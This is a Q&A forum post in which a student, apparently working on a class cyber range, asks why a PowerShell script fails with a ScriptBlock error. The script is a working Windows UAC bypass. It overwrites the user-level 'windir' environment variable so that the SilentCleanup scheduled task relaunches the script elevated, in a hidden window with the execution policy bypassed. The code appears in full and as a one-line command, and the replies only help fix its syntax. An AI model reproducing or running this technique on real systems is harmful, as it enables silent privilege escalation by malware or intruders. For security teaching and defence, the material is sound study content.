# ScriptBlock should only be specified error in powershell script

Tags: powershell

I am trying to create a script that bypasses UAC for my Cybersecurity class. For testing, I am having it create a text file on the desktop, but I get anerror when I try to run the following

```
if ((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match 'S-1-5-32-544')) {
    Set-Content C:\Users\student\Desktop\joe.txt 'joe mama'
} else {
    $registryPath = 'HKCU:\Environment'
    $Name = 'windir'
    $Value = 'powershell -ep bypass -w h $PSCommandPath;#'
    Set-ItemProperty -Path $registryPath -Name $name -Value $Value
    schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null
    Remove-ItemProperty -Path $registryPath -Name $name
}
```

Sorry for bad cropping I would copy and paste it but I am using a machine on a cyber range and I can't select text because my trackpad is broken

[error](https://i.stack.imgur.com/tFOdk.png)

I invoke it using `powershell -Command ((if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match 'S-1-5-32-544')) {;Set-Content C:\Users\student\Desktop\joe.txt 'joe mama';} else {;$registryPath = 'HKCU:\Environment';$Name = 'windir';$Value = 'powershell -ep bypass -w h $PSCommandPath;#';Set-ItemProperty -Path $registryPath -Name $name -Value $Value;schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null;Remove-ItemProperty -Path $registryPath -Name $name;};))`

Comment: What error - post it here? Also tidy up the formatting - your code is impossible to read like that.

Comment: You also have a hash character in your $Value definition that looks incorrect

Comment: @Scepticalist added my error

Comment: You error does not match code in question. Your error as if you have single quote `'` before `if`.

Comment: Please show how you invoke the code.

Comment: @PetSerAl sorry I ran it wrong I updated it

Answer (score 0):

You have an unexpected token error on `line:1 char:163`. If you look at that line and investigate, you should be able to find your issue. Usually has to deal with syntax. You're passing in an awful lot of code into the `-Command` parameter. Saving it to a script and calling it might produce better results. Also, I am not sure why you're enclosing the command with double `(( ))`. Passing it as a script block should work: `Powershell -Command {SOME CODE}`

If you're using Powershell 5.1, You can reference the manual [here](https://learn.microsoft.com/en-us/powershell/module/Microsoft.PowerShell.Core/About/about_PowerShell_exe?view=powershell-5.1).